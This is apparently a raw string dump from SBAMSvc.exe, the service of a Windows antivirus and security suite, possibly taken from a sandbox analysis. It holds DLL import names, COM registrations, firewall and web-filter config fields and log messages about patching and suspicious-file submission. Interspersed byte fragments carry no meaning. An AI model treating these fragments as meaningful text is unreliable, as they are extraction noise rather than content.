SMTPErrorString
SMTPErrorString="
CloseEmailWindowMsg="
BadUrlReplacementText="
BadUrlCheckingEnabled="
BadUrlActionEnum="
WindowsLiveMailClientEnabled="
EmailAVConfig\EmailAVConfig.cpp
QuarantineRecord\QuarantineRecord.cpp
WSCConfig\WSCConfig.cpp
APConfig\APConfig.cpp
BadUrls
FWWebFilterHourlyStats
FWWebFilterHourlyStats\FWWebFilterHourlyStats.cpp
FWWebFilterStats
UserKnownBadUrl
BadUrlBlockingException
UserKnownBadUrls
BadUrlBlockingExceptions
Ports
WebFilterStatsFreq
LogWebFilterEvents
LogWebFilterEvents="
WebFilterStatsFreq="
WebFilterConfig\WebFilterConfig.cpp
WebConfig
BadUrlRule
WebFilterEvent
BadUrlRule="
FWFilterHourlyStats
FWFilterHourlyStats\FWFilterHourlyStats.cpp
PortScanIntrusions
FWIDSHourlyStats
FWIDSHourlyStats\FWIDSHourlyStats.cpp
PortScanIntrusions="
TcpOutPackets
TcpOutBytes
TcpInPackets
TcpInBytes
UdpOutPackets
UdpOutBytes
UdpInPackets
UdpInBytes
FWNetworkHourlyStats
FWNetworkHourlyStats\FWNetworkHourlyStats.cpp
UdpInBytes="
UdpInPackets="
UdpOutBytes="
UdpOutPackets="
TcpInBytes="
TcpInPackets="
TcpOutBytes="
TcpOutPackets="
RemotePorts
LocalPorts
PortEnd
PortStart
PortType
PortScanLog
PortScanAllow
LogPacketsToUnopenedPorts
LogPortScans
LogPortScans="
LogPacketsToUnopenedPorts="
FirewallConfig\FirewallConfig.cpp
PortScanAllow="
PortScanLog="
PortType="
PortStart="
PortEnd="
Tcp_Udp_RemotePort
Tcp_Udp_LocalPort
PacketToUnopenedPortEvent
FWEvent\FWEvent.cpp
Tcp_Udp_LocalPort="
Tcp_Udp_RemotePort="
Msg="
FWIDSRules\FWIDSRules.cpp
HipsConfig\HipsConfig.cpp
HipsHourlyStats
HipsHourlyStats\HipsHourlyStats.cpp
ScanResultsSummary\ScanResultsSummary.cpp
Operation
?#%X.y
%S#[k
d:\projects\workspace\sdk-sdk\src\bin\Release\SBAMSvc.pdb
SpursDownload.dll
SBTE.dll
SBAPSetReportCallbackEx
SBAPSetReportCallback
sbap.dll
SBArva.dll
VERSION.dll
WinHttpSendRequest
WinHttpCloseHandle
WinHttpSetStatusCallback
WinHttpCrackUrl
WinHttpOpen
WinHttpConnect
WinHttpWriteData
WinHttpOpenRequest
WinHttpReadData
WinHttpReceiveResponse
WinHttpSetCredentials
WinHttpQueryAuthSchemes
WinHttpQueryDataAvailable
WinHttpQueryHeaders
WINHTTP.dll
WinHttpSetTimeouts
WINMM.dll
PSAPI.DLL
SbHips.dll
WS2_32.dll
msi.dll
GetExtendedTcpTable
GetExtendedUdpTable
IPHLPAPI.DLL
GetProcessHeap
SetThreadExecutionState
KERNEL32.dll
MsgWaitForMultipleObjects
USER32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
RegCreateKeyW
CryptDestroyKey
CryptDeriveKey
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
sfc.dll
pdh.dll
UrlGetPartW
SHLWAPI.dll
HttpAddUrl
HttpInitialize
HttpCreateHttpHandle
HttpReceiveHttpRequest
HttpSendHttpResponse
HttpReceiveRequestEntityBody
HttpRemoveUrl
HTTPAPI.dll
USERENV.dll
WinHttpSetOption
GetCPInfo
PeekNamedPipe
.?AV?$CAtlExeModuleT@VCSBAMSvcModule@@@ATL@@
.PA_W
.?AVISBWebFilterEvents@@
.?AV?$CProxy_ISBWebFilterEvents@VCSBWebFilter@@@@
.?AV?$IConnectionPointImplMT@VCSBWebFilter@@$1?_GUID_eecd4897_dd51_476d_9913_b9c808885f03@@3U__s_GUID@@BVCComDynamicUnkArray@ATL@@@ATL@@
.?AV?$CComClassFactorySingleton@VCSBWebFilter@@@ATL@@
.?AV?$CComObject@VCSBWebFilter@@@ATL@@
.?AVCSBWebFilter@@
.?AV?$CComCoClass@VCSBWebFilter@@$1?CLSID_SBWebFilter@@3U_GUID@@B@ATL@@
.?AV?$IConnectionPointContainerImpl@VCSBWebFilter@@@ATL@@
.?AUISBWebFilter@@
.?AV?$CComContainedObject@VCSBWebFilter@@@ATL@@
.?AV?$CComObjectCached@VCSBWebFilter@@@ATL@@
.?AV?$CComAggObject@VCSBWebFilter@@@ATL@@
.?AV?$CComObjectNoLock@V?$CComClassFactorySingleton@VCSBWebFilter@@@ATL@@@ATL@@
zcÁ
.?AVCHttpServerConfig@SbXmlHttpServerConfig@@
.?AVCMonitoredURL@SbXmlHttpServerConfig@@
.?AVCAllowedOperations@SbXmlHttpServerConfig@@
.?AVCWeb_Alerts@SbXmlSystemUpdateScanResults@@
.?AVCudp_ports@SbXmlSystemUpdateScanResults@@
.?AVCudp_ports_port@SbXmlSystemUpdateScanResults@@
.?AVCports@SbXmlSystemUpdateScanResults@@
.?AVCport@SbXmlSystemUpdateScanResults@@
.?AVCtransports@SbXmlSystemUpdateScanResults@@
.?AVCBadUrls@SbXmlEmailAvEvent@@
.?AVCBadUrls@SbXmlBadUrls@@
.?AVCFWWebFilterHourlyStats@SbXmlFWWebFilterHourlyStats@@
.?AVCFWWebFilterStats@SbXmlFWWebFilterHourlyStats@@
.?AVCWebConfig@SbXmlWebFilterConfig@@
.?AVCUserKnownBadUrls@SbXmlWebFilterConfig@@
.?AVCUserKnownBadUrl@SbXmlWebFilterConfig@@
.?AVCBadUrlBlockingExceptions@SbXmlWebFilterConfig@@
.?AVCBadUrlBlockingException@SbXmlWebFilterConfig@@
.?AVCPorts@SbXmlWebFilterConfig@@
.?AVCPort@SbXmlWebFilterConfig@@
.?AVCWebFilterEvent@SbXmlWebFilterEvent@@
.?AVCBadUrl@SbXmlWebFilterEvent@@
.?AVCFWFilterHourlyStats@SbXmlFWFilterHourlyStats@@
.?AVCFWFilterStats@SbXmlFWFilterHourlyStats@@
.?AVCFWIDSHourlyStats@SbXmlFWIDSHourlyStats@@
.?AVCFWIDSStats@SbXmlFWIDSHourlyStats@@
.?AVCFWNetworkHourlyStats@SbXmlFWNetworkHourlyStats@@
.?AVCFWNetworkStats@SbXmlFWNetworkHourlyStats@@
.?AVCRemotePorts@SbXmlFirewallConfig@@
.?AVCLocalPorts@SbXmlFirewallConfig@@
.?AVCPort@SbXmlFirewallConfig@@
.?AVCRemotePorts@SbXmlFWEvent@@
.?AVCLocalPorts@SbXmlFWEvent@@
.?AVCPort@SbXmlFWEvent@@
.?AVCPacketToUnopenedPortEvent@SbXmlFWEvent@@
.?AVCHipsHourlyStats@SbXmlHipsHourlyStats@@
.?AVCHipsStats@SbXmlHipsHourlyStats@@
'SBAMSvc.EXE'
SBAMSvc.SBScanControl.1 = s 'SBScanControl Class'
CLSID = s '{EC88394A-429C-4DDB-91EA-570E938B79DF}'
SBAMSvc.SBScanControl = s 'SBScanControl Class'
CurVer = s 'SBAMSvc.SBScanControl.1'
ForceRemove {EC88394A-429C-4DDB-91EA-570E938B79DF} = s 'SBScanControl Class'
ProgID = s 'SBAMSvc.SBScanControl.1'
VersionIndependentProgID = s 'SBAMSvc.SBScanControl'
'TypeLib' = s '{78FA6088-B9C6-4749-833B-4421E29E84E7}'
SBAMSvc.SBQuarantine.1 = s 'SBQuarantine Class'
CLSID = s '{8B404080-4780-4199-92ED-B05B61C657EE}'
SBAMSvc.SBQuarantine = s 'SBQuarantine Class'
CurVer = s 'SBAMSvc.SBQuarantine.1'
ForceRemove {8B404080-4780-4199-92ED-B05B61C657EE} = s 'SBQuarantine Class'
ProgID = s 'SBAMSvc.SBQuarantine.1'
VersionIndependentProgID = s 'SBAMSvc.SBQuarantine'
SBAMSvc.SBLogger.1 = s 'SBLogger Class'
CLSID = s '{24CEBDF0-E1CC-4933-893E-F1D1A4078D97}'
SBAMSvc.SBLogger = s 'SBLogger Class'
CurVer = s 'SBAMSvc.SBLogger.1'
ForceRemove {24CEBDF0-E1CC-4933-893E-F1D1A4078D97} = s 'SBLogger Class'
ProgID = s 'SBAMSvc.SBLogger.1'
VersionIndependentProgID = s 'SBAMSvc.SBLogger'
SBAMSvc.SBService.1 = s 'SBService Class'
CLSID = s '{FE7E09CE-BBF4-4698-8BC1-37C9002DAA43}'
SBAMSvc.SBService = s 'SBService Class'
CurVer = s 'SBAMSvc.SBService.1'
ForceRemove {FE7E09CE-BBF4-4698-8BC1-37C9002DAA43} = s 'SBService Class'
ProgID = s 'SBAMSvc.SBService.1'
VersionIndependentProgID = s 'SBAMSvc.SBService'
SBAMSvc.SBSoftwareUpdates.1 = s 'SBSoftwareUpdates Class'
CLSID = s '{2017CFB9-B2A2-4A98-BD9B-0D9D980B2193}'
SBAMSvc.SBSoftwareUpdates = s 'SBSoftwareUpdates Class'
CurVer = s 'SBAMSvc.SBSoftwareUpdates.1'
ForceRemove {2017CFB9-B2A2-4A98-BD9B-0D9D980B2193} = s 'SBSoftwareUpdates Class'
ProgID = s 'SBAMSvc.SBSoftwareUpdates.1'
VersionIndependentProgID = s 'SBAMSvc.SBSoftwareUpdates'
SBAMSvc.SBWSC.1 = s 'SBWSC Class'
CLSID = s '{157EAC4E-6E3C-419A-BDCB-546345690DEB}'
SBAMSvc.SBWSC = s 'SBWSC Class'
CurVer = s 'SBAMSvc.SBWSC.1'
ForceRemove {157EAC4E-6E3C-419A-BDCB-546345690DEB} = s 'SBWSC Class'
ProgID = s 'SBAMSvc.SBWSC.1'
VersionIndependentProgID = s 'SBAMSvc.SBWSC'
SBAMSvc.SBVipre.1 = s 'SBVipre Class'
CLSID = s '{C4F66612-D788-4F33-92AF-6DAC6FC80C35}'
SBAMSvc.SBVipre = s 'SBVipre Class'
CurVer = s 'SBAMSvc.SBVipre.1'
ForceRemove {C4F66612-D788-4F33-92AF-6DAC6FC80C35} = s 'SBVipre Class'
ProgID = s 'SBAMSvc.SBVipre.1'
VersionIndependentProgID = s 'SBAMSvc.SBVipre'
SBAMSvc.SBThreatDefinitions.1 = s 'SBThreatDefinitions Class'
CLSID = s '{05191E1B-B7D8-42DD-A52A-88011228A14F}'
SBAMSvc.SBThreatDefinitions = s 'SBThreatDefinitions Class'
CurVer = s 'SBAMSvc.SBThreatDefinitions.1'
ForceRemove {05191E1B-B7D8-42DD-A52A-88011228A14F} = s 'SBThreatDefinitions Class'
ProgID = s 'SBAMSvc.SBThreatDefinitions.1'
VersionIndependentProgID = s 'SBAMSvc.SBThreatDefinitions'
SBAMSvc.SBActiveProtection.1 = s 'SBActiveProtection Class'
CLSID = s '{5F6DA338-15AC-4927-BC8B-B8C52EEEC9EB}'
SBAMSvc.SBActiveProtection = s 'SBActiveProtection Class'
CurVer = s 'SBAMSvc.SBActiveProtection.1'
ForceRemove {5F6DA338-15AC-4927-BC8B-B8C52EEEC9EB} = s 'SBActiveProtection Class'
ProgID = s 'SBAMSvc.SBActiveProtection.1'
VersionIndependentProgID = s 'SBAMSvc.SBActiveProtection'
SBAMSvc.SBRegistration.1 = s 'SBRegistration Class'
CLSID = s '{15C44439-2DE8-4217-B61D-146E347199A6}'
SBAMSvc.SBRegistration = s 'SBRegistration Class'
CurVer = s 'SBAMSvc.SBRegistration.1'
ForceRemove {15C44439-2DE8-4217-B61D-146E347199A6} = s 'SBRegistration Class'
ProgID = s 'SBAMSvc.SBRegistration.1'
VersionIndependentProgID = s 'SBAMSvc.SBRegistration'
SBAMSvc.SBEmailAV.1 = s 'SBEmailAV Class'
CLSID = s '{DB7777B6-5C67-4C49-BD93-EE9AE1F03085}'
SBAMSvc.SBEmailAV = s 'SBEmailAV Class'
CurVer = s 'SBAMSvc.SBEmailAV.1'
ForceRemove {DB7777B6-5C67-4C49-BD93-EE9AE1F03085} = s 'SBEmailAV Class'
ProgID = s 'SBAMSvc.SBEmailAV.1'
VersionIndependentProgID = s 'SBAMSvc.SBEmailAV'
SBAMSvc.SBWebFilter.1 = s 'SBWebFilter Class'
CLSID = s '{2BAA4D68-DB29-40DF-806A-B392073A7EF2}'
SBAMSvc.SBWebFilter = s 'SBWebFilter Class'
CurVer = s 'SBAMSvc.SBWebFilter.1'
ForceRemove {2BAA4D68-DB29-40DF-806A-B392073A7EF2} = s 'SBWebFilter Class'
ProgID = s 'SBAMSvc.SBWebFilter.1'
VersionIndependentProgID = s 'SBAMSvc.SBWebFilter'
SBAMSvc.SBFirewall.1 = s 'SBFirewall Class'
CLSID = s '{F2C6E6BB-C773-4941-B61B-3CBEFD46F64D}'
SBAMSvc.SBFirewall = s 'SBFirewall Class'
CurVer = s 'SBAMSvc.SBFirewall.1'
ForceRemove {F2C6E6BB-C773-4941-B61B-3CBEFD46F64D} = s 'SBFirewall Class'
ProgID = s 'SBAMSvc.SBFirewall.1'
VersionIndependentProgID = s 'SBAMSvc.SBFirewall'
SBAMSvc.SBHIPS.1 = s 'SBHIPS Class'
CLSID = s '{4BB09156-340D-491A-B86B-A0C2A7BA26A9}'
SBAMSvc.SBHIPS = s 'SBHIPS Class'
CurVer = s 'SBAMSvc.SBHIPS.1'
ForceRemove {4BB09156-340D-491A-B86B-A0C2A7BA26A9} = s 'SBHIPS Class'
ProgID = s 'SBAMSvc.SBHIPS.1'
VersionIndependentProgID = s 'SBAMSvc.SBHIPS'
SBAMSvc.SBLanGuard.1 = s 'SBLanGuard Class'
CLSID = s '{85300480-82AD-4892-9043-35D62E097D66}'
SBAMSvc.SBLanGuard = s 'SBLanGuard Class'
CurVer = s 'SBAMSvc.SBLanGuard.1'
ForceRemove {85300480-82AD-4892-9043-35D62E097D66} = s 'SBLanGuard Class'
ProgID = s 'SBAMSvc.SBLanGuard.1'
VersionIndependentProgID = s 'SBAMSvc.SBLanGuard'
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
3 373<3}3
6e6%7s8
4%5u5
(12171<1
6)73787=7
5"546>6`6|6
< <$<(<,<0<4<8<<<@<
<!=&>3>~?
7%8S8i8
3?7u7
0S0^1u1
: :$:(:,:0:4:8:
7!7(7/787
1$2-2*3/3
=$=*=/=}=
>-?2?7?{?
9,:1:6:}:
= =0=5=:=
>'>5>:>?>_>
9$:0:5:::
0050:0[0
2!252:2?2
<.<3<8<{<
;!;(;/;8;
94999>9}9
0 0%0*1/141
: ;$;(;,;
4O4S4
: :':,:1:
0#0*01080
1/141:1{1
6!6&676=6
5 5_5x5
3 3=3I3N3{3
4O4
5%5U5^5g5
6%6U6^6g6
7%7U7^7g7
8%8U8^8g8
9%9U9^9g9
00C0[0k0p0u0
3<3l3u3|3
1%2*2/2~2
5_5a5
7#868[9`9
0?0D0,3t3
2 2$2(2,2
6!676?6{6
191>1!232
1,252@2{2
< <$<(<,<0<4<
: :$:(:,:0:4:8:<:
> ?$?(?,?0?4?8?<?@?
5 5$5(5,50545
= >$>(>,>0>4>
9 949<9\9
2$2,282\2|2
>,>8>@>`>
? ?(?0?<?`?
:$:<:@:\:`:
0 0@0\0|0
3VIPREHttpServer
Failed in starting process commandLine<%s>
WaitForSingleObject returned WAIT_ABANDONED commandLine<%s>
WaitForSingleObject returned WAIT_TIMEOUT commandLine<%s>
fullCmd<%s> waitTime<%d> mils
Failed to open Registry key<%s>, regRc<%u>.
Failed to read registry key <%s\%s>, regRc<%u>.
HttpServer Thread stopped.
Couldn't terminate HttpServer thread.
SBHttpServer
CSBHttpServerImpl::StopThread
Couldn't stop HttpServer thread. Attempting to Terminate Thread.
CSBHttpServerImpl::StopController
HttpServer controller stopped.
127.0.0.1
Config file may not exist or is corrupted. Creating default config file for the HttpServer controller.
HttpServer Thread quit event set.
Unknown return status from WaitForMultipleObjects() [%u].
Waiting for HttpServer events.
Registering %s failed with %lu
hXXp:// :53911/WOT/Query/
CSBHttpServerImpl::HttpServerThread
HttpInitialize failed with %lu
HttpServer thread succesfully started
Failed starting HttpServer thread.
The HttpServer thread is already running.
CSBHttpServerImpl::StartThread
Starting HttpServer thread.
the HttpServer config file
CSBHttpServerImpl::SaveConfigToDisk
HttpServerConfig.xml
CSBHttpServerImpl::GetConfigObjectFromDisk
Couldn't start HttpServer controller's thread.
HttpServer thread started successfully.
HttpServerConfig not loaded successfully. Using default values, changes not persisted.
HttpServerConfig Loaded successfully.
HttpServer thread already started, exiting StartController.
CSBHttpServerImpl::StartController
Entering HttpServer module StartController.
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
CSBLanGuard::StopAllRemediationOperations
CSBLanGuard::GetWindowsUpdateSettings
CSBLanGuard::SetWindowsUpdateSettings
Setting the this pointer for the LanGuard CoClass [%x].
An error occurred attempting to get the Windows Update ScheduledInstallationTime setting hr=[%x].
An error occurred attempting to get the Windows Update ScheduledInstallationDay setting hr=[%x].
An error occurred attempting to get the Windows Update ReadOnly setting hr=[%x].
An error occurred attempting to get the Windows Update Required setting hr=[%x].
An error occurred attempting to get the Windows Update notification level setting hr=[%x].
An error occurred attempting to get the Windows Update settings hr=[%x].
An error occurred attempting to set the Windows Update ServiceEnabled setting hr=[%x].
CSBLanGuardImpl::GetWindowsUpdateSettings
Unable to CoCreateInstance for AutomaticUpdateSettings, hr=[%x].
Enabled the Windows Update service.
An error occurred attempting to enable the Windows Update service hr=[%x].
Unable to set Windows Updates settings because they are ReadOnly. This may be caused by a GroupPolicy setting that prevents this user from changing the settings.
An error occurred attempting to save the current Windows Update settings hr=[%x].
An error occurred attempting to set the Windows Update ScheduledInstallationTime setting to [%d], hr=[%x].
An error occurred attempting to set the Windows Update ScheduledInstallationDay setting to [%d], hr=[%x].
An error occurred attempting to set the Windows Update notification level setting to [%d], hr=[%x].
An error occurred attempting to read the current Windows Update setting hr=[%x].
CSBLanGuardImpl::SetWindowsUpdateSettings
IDispatch error #%d
Adding System Update schedule item. The last scan was run on (%s), the ScanInterval is [%d] hours.
Adding System Update schedule item. The last definition update check was run on (%s), the UpdateInterval is [%d] hours.
Unable to locate an item in the HiddenUpdates collection while trying to remove an item from the HiddenUpdates collection. The update ID (%s) may not be removed from the Hidden Updates collection and may NOT be show to the user.
Found Update name (%s), with matching Digest of (%s).
Last successful scan results path is <%s>.
An error occurred attempting to initialize LanGuard; com error(0x%x) : (%s)
An error occurred attempting to initialize LanGuard; return code (0x%x)
Got current thread state (%s) and reboot required is (%s).
Error creating the MantleServer object; com error:<%x> (%s). Unable to communicate with the LanGuard process.
Failed connecting to the MantleServer object; com error:<%x> (%s)
Error creating the MantleServer object; com error: <0x%x> (%s). Unable to communicate with the LanGuard process.
We were unable to Create an instance of the LanGuard interface and the result returned was [0x%x]. We are NOT connected to the LanGuard interface.
An error occurred attempting to StopAllScans; com error(0x%x) : (%s)
An error occurred attempting to StopAllRemediationOperations; com error(0x%x) : (%s)
Stopped all LanGuard RemediationOperations successfully.
CSBLanGuardImpl::StopAllRemediationOperations
Unable to stop all LanGuard RemediationOperations. This may be because there are no RemediationOperations currently running.
An error occurred attempting to configure the System Update proxy settings; com error(0x%x) : (%s)
The System Update ProxySettings are (%s) in the configuration file. The LanGuard system will be configured to use (%s) Proxy settings.
An error occurred attempting to ResetProxyToAutomatic; return code (0x%x)
An error occurred attempting to SetProxyServer; return code (0x%x)
An error occurred attempting to SetProxyCredentials; return code (0x%x)
Couldn't find the product element for this patch (%s) in the scan results. Unable to populate the telemetry data.
DownloadFileUrl
Found the product element for this patch (%s) in the scan results. Will populate the telemetry data.
An error occurred attempting to get Languard Build; com error(0x%x) : (%s)
Languard version is <%s>, build is <%s>
MantleServer build returned: (%s)
ERROR: error geting the MantleServer Build; hr: (%x)
An error occurred attempting to get Languard Version; com error(0x%x) : (%s)
MantleServer version returned: (%s)
ERROR: error geting the MantleServer Version; hr: (%x)
Could not create volatile registry key after update.
Created volatile registry key after update.
Languard Definitions version is <%s>, install date is <%s>
An error occurred trying to read the version file (%s) for System Update definitions version.
\toolcfg_updates.xml
MantleServer GetDataDir returned: (%s)
ERROR: error geting the Languard DataDir; hr: (%x)
An error [%d] (%s) occurred de-serializing System Update Scan from the file <%s>. Unable to determine if a postreboot scan is required.
Failed to serialize %s.
Error serializing %s--%s
Bad argument; pXmlBuf is NULL. %s.
Failed to deserialize %s.
Error deserializing %s--%s
While trying to write LanGuard Config File (%s), received error.
Unable change attributes on the config file: %s
LanGuardConfig.xml
While trying to write a default LanGuard Config File (%s), received error.
While reading the LanGuard Config File (%s). Config file may not exist or is corrupted. Creating default config file for the LanGuard controller.
There are [%u] total updates, [%u] hidden updates and [%u] critical updates.
Update name (%s) is a Microsoft Update. Skipping
The LMX Error [%d] occurred trying to add a blank Update item to the Updates collection. LMX errors are listed in ..\vendor\LMX\include\lmxinternals.h
Added Update name (%s), with Importance of (%s).
Adding [%d] Updates for Product name (%s).
Added dateTimeStamp start: (%s) and end: (%s).
Adding Updates for [%d] Products to the Updates collection.
An error [%d] (%s) occurred de-serializing System Update Scan from the file <%s>. Unable to calculate the Update counts for these scan results.
The most recent System Updates scan results file is (%s). We will calculate the counts for Updates using this scan results file.
\LG*.xml
Initialized m_sbxmlTelemetry object from %s
%s\%s
teltempfile.tmp
\telemetryfile.xml
Transferred telemetry data file named (%s) to the service as (%s).
SbXml::SaveToFileSimply returned false trying to save (%s).
An error occurred attempting to RemediatePatches; com error(0x%x) : (%s)
RemediatePatches returned an unknown error [%u] (%s).
RemediatePatches returned [%u] remediation was successfull, but some patch requires a reboot to be effective.
RemediatePatches returned an error [%u] remediation engine error (timeout expired while executing patches, default 6 hours) (%s).
RemediatePatches returned an error [%u] unexpected exception (%s).
RemediatePatches returned an error [%u] failure while reading the scanresults database (%s).
RemediatePatches returned an error [%u] one of the patch digests passed for deployment was not found in the scan results (%s).
RemediatePatches returned an error [%u] command XML is invalid (%s).
%s: hr = %d
An error occurred attempting to RemediatePatches; return code (0x%x)
Will remediate using the Patches collection provided (%s).
An error [%d] (%s) occurred de-serializing System Update Scan from the file <%s>. Unable to remediate these scan results.
Remediation input file moved from <%s> to <%s>.
Failed copying file from <%s> to <%s>. System Updates unable to complete the remediation operation.
The System Updates scan results file is (%s). We will build the list of updates to apply using this scan results file.
An error occurred attempting to LaunchScan; com error(0x%x) : (%s)
An error occurred attempting to LaunchScan; return code (0x%x)
Couldn't deserialize LanGuard Scan results <%s>, unable to process the scan results.
An error [%d] (%s) occurred saving the System Update Scan results to <%s>. The results of this scan will not be available.
Successfully updated System Update Scan results from <%s>.
Launching (%s) Scan. Directing scan output to (%s).
LG%Y%m%d%H%M%S.xml
An error occurred attempting to UpdateAgent; com error(0x%x) : (%s)
An error occurred attempting to UpdateAgent; return code (0x%x)
Couldn't deserialize LanGuard Scan results <%s>, unable to process the post remediation scan results.
Successfully updated System Update Post Remediation Scan results from <%s>.
Unexpected return status from WaitForMultipleObjects() [%u]. Will ignore and wait for next event.
System Update is set to auto apply patches after a scan. Setting the event to start the remediation process using the scan results file (%s).
It has been [%d] days since our last check for System Update definitions. Definitions update before scan starting.
_pt-BR.dll
_it-IT.dll
_en-US.dll
_de-DE.dll
Loaded resource file <%s>
Unable to load resource file <%s>
\SBRES_*_*.dll
UI Default Language is: %d
Lazy scan stopping at folder=<%s>, file=<%s>
Lazy scan stopping at folder=<%s>
Lazy scan root folder=<%s>
User is %s
UserIdleTime=<%u>
CPU is %s, Disk is %s
SBWinHttp callback returned result: %d
Error sending file to BD: [%u].
Adding File to cache: %s
Could not open MIMETypes.txt
Invalid word on MIMEtype.txt for ON/OFF field: (%s)
SiteID is in range. The Enabled flag is <%s>.
SiteID=<%s>, Enable=<%s>, MinID=<%s>, MaxID=<%s>
\MIMETypes.txt
Unable to get file handle for: (%s)
Could not create ThreatNetTransfer XML for: (%s)
Could not crack the ThreaNet URL nothing will be getting sent. URL=%s
Could not create temp file for transfer. Skipping: %s
Saving query list to %s
%s\Query-%d.xml
Received action response from query: %u
Send file queue max reached in SENDFILE. Dropping file: (%s)
Send file queue max reached in SENDFILEANDCACHE. Dropping file: (%s)
Response file path not found in Query: (%s)
ThreatNetConfig.xml
Setting Threatnet send URL to: (%s).
Setting Threatnet URL to: (%s).
Setting Threatnet query URL to: (%s).
Failed starting ThreatNet thread. Windows Security Center status will not be updated.
Error opening reg key Software\Microsoft\Windows\CurrentVersion\Run.
Sucessfully read keys from Software\Microsoft\Windows\CurrentVersion\Run.
Software\Microsoft\Windows\CurrentVersion\Run
Error opening reg key SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run.
Sucessfully read keys from SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run.
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
%d.%d
ThreatNetFileCache.txt
RegOpenKeyEx failed deleting sbamui run key value.
RegDeleteValue failed with return code [%ld] deleting sbamui run key value. Key will not exist after first run.
DeleteRunKeyValue
SBAMUI run key value not found.
AdjustTokenPrivileges (%s) failed.
LookupPrivilegeValue (%s) failed.
{31463A1D-577C-4D78-A9C8-0A65C17727B5}
OnPowerEvent dwEeventType=[%d].
Updated checkpoint [%d] and ServiceStatus is [%d].
OLEAUT32.DLL
Failed starting update_status_thread_handle thread. The service status may not be reported correctly during shutdown process.
HandlerEx dwEeventType=[%d].
HandlerEx dwOpcode=[%d].
Waiting for the Threat Engine Open thread to finish, current CheckPoint is (%d). CheckPoints occur every five seconds until the Threat Engine open completes.
Renamed the old scan history folder (%s) to (%s).
CoInitializeSecurity() failed. HR=0xx
Mscoree.dll
CProxy_ISBServiceEvents<class CSBService>::Fire_SendMsgToClientsCB
CSBService::SendMsgToClients
CSBService::OnSendMsgToClientsCB
Setting the this pointer for the Service CoClass [%x].
SERVICE_CONTROL_STOP control message has been sent to the service (%s)
OpenService for (%s) failed. Unable to send the Stop command to the Service.
Set the Service thread priority to %d. This should be THREAD_PRIORITY_NORMAL.
The power status is %d.
Service ErrorState is currently [%s].
CSBServiceImpl::SendMsgToClients
A client is sending a message of type %d, parameters [%u], [%u] to all other clients.
The Embassy Trust Suites wxvault.dll was successfully unloaded from our process space.
Couldn't unload the Embassy Trust Suites wxvault.dll from our process space.
Found the Embassy Trust Suites wxvault.dll loaded into our process space. Attempting to unload it.
wxvault.dll
Failed to OpenService on (%s).
Couldn't read "HKLM\Software" key.
Couldn't read "HKLM\Software\SBAMSvc" key.
Retrieved Enterprise Product Code value [%d] under HKLM\Software\SBAMSvc key. This is an Enterprise agent.
CSBServiceImpl::RetrieveEnterpriseRegKeys
Couldn't get Enterprise Product Code value under "HKLM\Software\SBAMSvc" key. This is not an Enterprise agent.
Couldn't read (%s) key.
CSBServiceImpl::CreateVolatileSystemUpdateRestartKey
Couldn't open "HKLM\Software" key.
Couldn't open "HKLM\Software\SBAMSvc" key.
couldn't set "Company" value under "HKLM\Software\SBAMSvc" key
couldn't set "Product" value under "HKLM\Software\SBAMSvc" key
company <%s> and product <%s> names persisted
Could not write TypesSupported registry key, error [%ld].
TypesSupported
Could not write EventMessageFile registry key, error [%ld], path (%s).
Could not write CategoryMessageFile registry key, error [%ld], path (%s).
Could not write CategoryCount registry key, error [%ld].
Could not open CurrentControlSet\Services\EventLog\Application\SBAMSvc registry key, error [%ld].
CSBServiceImpl::WriteEventLogKeyToRegistry
Could not open HKLM\System registry key.
Scheduled update or scan is starting now (%s), the last time we woke from sleep was (%s), tNow - tWakeTime = [%d].
Have not already sent this Threat file <%s> to ThreatNet.
Threat file <%s> with no MD5 was already sent to ThreatNet. Threat file will not be sent to ThreatNet again.
Threat file <%s> with MD5 <%s> was already sent to ThreatNet. Threat file will not be sent to ThreatNet again.
Unable to save company <%s> and product <%s> names. There may be problem with the registry. Application data may be written to a different folder.
Saved company <%s> and product <%s> names.
version is <%s>
Unable to set the service startup type to delayed auto start. Non Vista OS doesn't support that setting.
ChangeServiceConfig2 called with service type of delayed SERVICE_AUTO_START for the service (%s)
ChangeServiceConfig2 for (%s) failed. Unable to set the service startup type to delayed auto start.
ChangeServiceConfig called with service type of SERVICE_AUTO_START for the service (%s)
ChangeConfigService for (%s) failed. Unable to send the ChangeServiceConfig command to set the service startup type to auto start.
OpenService for (%s) failed. Unable to send the ChangeServiceConfig command to set the service startup type to auto start.
HTTP Error:%ld
%ld:%s
winhttp.dll
Couldn't create "HKLM\Software\SBAMSvc" key.
Couldn't create default "Product" value under "HKLM\Software\SBAMSvc" key
Couldn't create default "Company" value under "HKLM\Software\SBAMSvc" key.
Created default "(%s)" value under "HKLM\Software\SBAMSvc" key.
Couldn't get "Company" value under "HKLM\Software\SBAMSvc" key. Creating default values.
Company <%s> and product <%s> names retrieved.
Unable to create folder. AppDataFolder specified but the path (%s) was invalid.
Wrote data of length <%d> into file path <%s>.
Wrote <%d> but expected to write <%d>. Write file operation failed, file incomplete.
Failed writing data into file <%s>. Write file operation failed.
Failed writing BOM into file path <%s>. Write file operation failed.
Couldn't open file path <%s>. Write file operation failed.
-X.xml
\%Y%m%d%H%M%S.xml
\AP-%Y%m%d%H%M%S
knownType=%d MD5=<%s> csOriginalThreatFilepath=<%s>.
Threw an error trying to launch one or more Trays with the path of %s.
An error occured launching one or more Trays with a path of %s.
Tray Execute
The Tray(s) were successfully executed %s.
SBAMTray.exe"
Converted Threat Name (%s) to valid file name.
Checking (%s) to make sure it is valid file name.
/\:?"*<>|
Couldn't get the installation folder. Unable to set <%s> environment variable.
Exceeded max %d in m_AlreadySentToTN. Removing the first in the collection <%s>.
Remembering file path <%s> so we don't send it to ThreatNet again.
Remembering MD5 <%s> for threat <%s> so we don't send it to ThreatNet again.
Unable to transfer suspicious file (%s) from APEventID (%s). One or both of the parameters is empty.
